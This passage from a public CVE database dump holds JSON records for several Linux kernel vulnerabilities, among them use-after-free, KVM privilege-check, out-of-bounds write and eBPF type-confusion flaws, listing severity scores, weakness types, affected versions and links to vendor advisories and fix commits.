          "value": "A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is an unknown function of the file mm/memory.c of the component Driver Handler. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211020."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-16T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=16ce101db85db694a91380aa4c89b25530871d33"
        },
        {
          "url": "https://vuldb.com/?id.211020"
        }
      ],
      "title": "Linux Kernel Driver memory.c use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3523",
    "datePublished": "2022-10-16T00:00:00",
    "dateReserved": "2022-10-16T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.094Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-10853
Vulnerability from cvelistv5
Published
2018-09-11 14:00
Modified
2024-08-05 07:46
Severity
Summary
A flaw was found in the way Linux kernel KVM hypervisor before 4.18 emulated instructions such as sgdt/sidt/fxsave/fxrstor. It did not check current privilege(CPL) level while emulating unprivileged instructions. An unprivileged guest user/process could use this flaw to potentially escalate privileges inside guest.
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T07:46:47.491Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "[debian-lts-announce] 20180714 [SECURITY] [DLA 1422-1] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00015.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10853"
          },
          {
            "name": "USN-3777-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3777-1/"
          },
          {
            "name": "[debian-lts-announce] 20180715 [SECURITY] [DLA 1422-2] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=129a72a0d3c8e139a04512325384fe5ac119e74"
          },
          {
            "name": "[debian-lts-announce] 20180718 [SECURITY] [DLA 1423-1] linux-4.9 new package",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00020.html"
          },
          {
            "name": "USN-3777-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3777-2/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c9fa24ca7c9c47605672916491f79e8ccacb9e6"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.openwall.com/lists/oss-security/2018/09/02/1"
          },
          {
            "name": "openSUSE-SU-2019:1407",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00043.html"
          },
          {
            "name": "RHSA-2019:2043",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2019:2043"
          },
          {
            "name": "RHSA-2019:2029",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2019:2029"
          },
          {
            "name": "RHSA-2020:0036",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0036"
          },
          {
            "name": "RHSA-2020:0103",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0103"
          },
          {
            "name": "RHSA-2020:0179",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0179"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.18"
            }
          ]
        }
      ],
      "datePublic": "2018-06-05T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A flaw was found in the way Linux kernel KVM hypervisor before 4.18 emulated instructions such as sgdt/sidt/fxsave/fxrstor. It did not check current privilege(CPL) level while emulating unprivileged instructions. An unprivileged guest user/process could use this flaw to potentially escalate privileges inside guest."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-250",
              "description": "CWE-250",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-01-21T19:06:24",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "[debian-lts-announce] 20180714 [SECURITY] [DLA 1422-1] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00015.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10853"
        },
        {
          "name": "USN-3777-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3777-1/"
        },
        {
          "name": "[debian-lts-announce] 20180715 [SECURITY] [DLA 1422-2] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=129a72a0d3c8e139a04512325384fe5ac119e74"
        },
        {
          "name": "[debian-lts-announce] 20180718 [SECURITY] [DLA 1423-1] linux-4.9 new package",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00020.html"
        },
        {
          "name": "USN-3777-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3777-2/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c9fa24ca7c9c47605672916491f79e8ccacb9e6"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.openwall.com/lists/oss-security/2018/09/02/1"
        },
        {
          "name": "openSUSE-SU-2019:1407",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00043.html"
        },
        {
          "name": "RHSA-2019:2043",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2019:2043"
        },
        {
          "name": "RHSA-2019:2029",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2019:2029"
        },
        {
          "name": "RHSA-2020:0036",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0036"
        },
        {
          "name": "RHSA-2020:0103",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0103"
        },
        {
          "name": "RHSA-2020:0179",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0179"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "secalert@redhat.com",
          "ID": "CVE-2018-10853",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "4.18"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A flaw was found in the way Linux kernel KVM hypervisor before 4.18 emulated instructions such as sgdt/sidt/fxsave/fxrstor. It did not check current privilege(CPL) level while emulating unprivileged instructions. An unprivileged guest user/process could use this flaw to potentially escalate privileges inside guest."
            }
          ]
        },
        "impact": {
          "cvss": [
            [
              {
                "vectorString": "7/CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ]
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-250"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "[debian-lts-announce] 20180714 [SECURITY] [DLA 1422-1] linux security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00015.html"
            },
            {
              "name": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10853",
              "refsource": "CONFIRM",
              "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10853"
            },
            {
              "name": "USN-3777-1",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3777-1/"
            },
            {
              "name": "[debian-lts-announce] 20180715 [SECURITY] [DLA 1422-2] linux security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html"
            },
            {
              "name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=129a72a0d3c8e139a04512325384fe5ac119e74",
              "refsource": "CONFIRM",
              "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=129a72a0d3c8e139a04512325384fe5ac119e74"
            },
            {
              "name": "[debian-lts-announce] 20180718 [SECURITY] [DLA 1423-1] linux-4.9 new package",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00020.html"
            },
            {
              "name": "USN-3777-2",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3777-2/"
            },
            {
              "name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c9fa24ca7c9c47605672916491f79e8ccacb9e6",
              "refsource": "CONFIRM",
              "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c9fa24ca7c9c47605672916491f79e8ccacb9e6"
            },
            {
              "name": "https://www.openwall.com/lists/oss-security/2018/09/02/1",
              "refsource": "MISC",
              "url": "https://www.openwall.com/lists/oss-security/2018/09/02/1"
            },
            {
              "name": "openSUSE-SU-2019:1407",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00043.html"
            },
            {
              "name": "RHSA-2019:2043",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2019:2043"
            },
            {
              "name": "RHSA-2019:2029",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2019:2029"
            },
            {
              "name": "RHSA-2020:0036",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2020:0036"
            },
            {
              "name": "RHSA-2020:0103",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2020:0103"
            },
            {
              "name": "RHSA-2020:0179",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2020:0179"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2018-10853",
    "datePublished": "2018-09-11T14:00:00",
    "dateReserved": "2018-05-09T00:00:00",
    "dateUpdated": "2024-08-05T07:46:47.491Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-19332
Vulnerability from cvelistv5
Published
2020-01-09 14:41
Modified
2024-08-05 02:16
Severity
Summary
An out-of-bounds memory write issue was found in the Linux Kernel, version 3.13 through 5.4, in the way the Linux kernel's KVM hypervisor handled the 'KVM_GET_EMULATED_CPUID' ioctl(2) request to get CPUID features emulated by the KVM hypervisor. A user or process able to access the '/dev/kvm' device could use this flaw to crash the system, resulting in a denial of service.
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T02:16:47.112Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-19332"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.openwall.com/lists/oss-security/2019/12/16/1"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://lore.kernel.org/kvm/000000000000ea5ec20598d90e50%40google.com/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/155890/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.html"
          },
          {
            "name": "[debian-lts-announce] 20200118 [SECURITY] [DLA 2068-1] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00013.html"
          },
          {
            "name": "USN-4254-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4254-1/"
          },
          {
            "name": "USN-4254-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4254-2/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20200204-0002/"
          },
          {
            "name": "USN-4258-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4258-1/"
          },
          {
            "name": "USN-4287-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4287-1/"
          },
          {
            "name": "USN-4287-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4287-2/"
          },
          {
            "name": "[debian-lts-announce] 20200302 [SECURITY] [DLA 2114-1] linux-4.9 security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
          },
          {
            "name": "USN-4284-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4284-1/"
          },
          {
            "name": "openSUSE-SU-2020:0336",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00021.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.13 through 5.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An out-of-bounds memory write issue was found in the Linux Kernel, version 3.13 through 5.4, in the way the Linux kernel\u0027s KVM hypervisor handled the \u0027KVM_GET_EMULATED_CPUID\u0027 ioctl(2) request to get CPUID features emulated by the KVM hypervisor. A user or process able to access the \u0027/dev/kvm\u0027 device could use this flaw to crash the system, resulting in a denial of service."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-787",
              "description": "CWE-787",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-03-13T13:06:31",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-19332"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.openwall.com/lists/oss-security/2019/12/16/1"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://lore.kernel.org/kvm/000000000000ea5ec20598d90e50%40google.com/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/155890/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.html"
        },
        {
          "name": "[debian-lts-announce] 20200118 [SECURITY] [DLA 2068-1] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00013.html"
        },
        {
          "name": "USN-4254-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4254-1/"
        },
        {
          "name": "USN-4254-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4254-2/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20200204-0002/"
        },
        {
          "name": "USN-4258-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4258-1/"
        },
        {
          "name": "USN-4287-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4287-1/"
        },
        {
          "name": "USN-4287-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4287-2/"
        },
        {
          "name": "[debian-lts-announce] 20200302 [SECURITY] [DLA 2114-1] linux-4.9 security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
        },
        {
          "name": "USN-4284-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4284-1/"
        },
        {
          "name": "openSUSE-SU-2020:0336",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00021.html"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2019-19332",
    "datePublished": "2020-01-09T14:41:03",
    "dateReserved": "2019-11-27T00:00:00",
    "dateUpdated": "2024-08-05T02:16:47.112Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3649
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel BPF inode.c nilfs_new_inode use after free
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.289Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d325dc6eb763c10f591c239550b8c7e5466a5d09"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211992"
          },
          {
            "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
          },
          {
            "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20230214-0009/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_new_inode of the file fs/nilfs2/inode.c of the component BPF. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211992."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 3.1,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-02-14T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d325dc6eb763c10f591c239550b8c7e5466a5d09"
        },
        {
          "url": "https://vuldb.com/?id.211992"
        },
        {
          "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
        },
        {
          "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230214-0009/"
        }
      ],
      "title": "Linux Kernel BPF inode.c nilfs_new_inode use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3649",
    "datePublished": "2022-10-21T00:00:00",
    "dateReserved": "2022-10-21T00:00:00",
    "dateUpdated": "2024-08-03T01:14:03.289Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-34866
Vulnerability from cvelistv5
Published
2022-01-25 15:30
Modified
2024-08-04 00:26
Severity
Summary
This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel 5.14-rc3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of eBPF programs. The issue results from the lack of proper validation of user-supplied eBPF programs, which can result in a type confusion condition. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel. Was ZDI-CAN-14689.
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T00:26:54.201Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.zerodayinitiative.com/advisories/ZDI-21-1148/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220217-0008/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14-rc3"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ryota Shiga(@Ga_ryo_) of Flatt Security"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel 5.14-rc3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of eBPF programs. The issue results from the lack of proper validation of user-supplied eBPF programs, which can result in a type confusion condition. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel. Was ZDI-CAN-14689."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-843",
              "description": "CWE-843: Access of Resource Using Incompatible Type (\u0027Type Confusion\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-02-17T17:06:22",
        "orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
        "shortName": "zdi"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.zerodayinitiative.com/advisories/ZDI-21-1148/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220217-0008/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "zdi-disclosures@trendmicro.com",
          "ID": "CVE-2021-34866",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "5.14-rc3"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": "Ryota Shiga(@Ga_ryo_) of Flatt Security",
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
